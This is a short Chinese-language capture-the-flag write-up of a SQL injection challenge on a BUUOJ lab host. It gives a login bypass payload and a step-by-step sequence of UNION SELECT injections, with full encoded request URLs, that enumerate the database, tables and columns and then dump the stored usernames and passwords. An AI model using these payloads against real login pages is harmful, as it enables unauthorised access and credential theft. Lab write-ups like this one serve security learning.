一.进入环境,输入万能密码
1' or 1=1 #
1" or 1=1 #
发现是单引号注入
成功登录,获得一条MD5值
二.查询列数
因为URL地址栏会对输入的字符进行URL编解码,所以一开始输入的1' order by 3 #
要进行一次编码1' order by 3 %23
http://f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=1' order by 3 %23
有回显,输入4发现提示错误,说明这个数据库只有3列
三.联合查询,判断注入点
1' union select 1,2,3 #
1' union select 1,2,3 %23
http://f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=%27%20union%20select%201,2,3%20%23
判断注入点是第三位
四.爆库
1' union select 1,2,database() %23
http://f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=1%27%20union%20select%201,2,database()%20%23
得到库名为geek
五.爆表
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' %23
http://f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27geek%27%20%23
得到两个表名
六.爆字段
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #
http://f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27l0ve1ysq1%27%20%23
得到字段名
七.爆字段内容
1' union select 1,2,group_concat(id,username,password) from geek.l0ve1ysq1 %23
f3431d80-bec3-4bf7-bb3a-17c97b40ab41.node4.buuoj.cn:81/check.php?username=admin&password=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 %23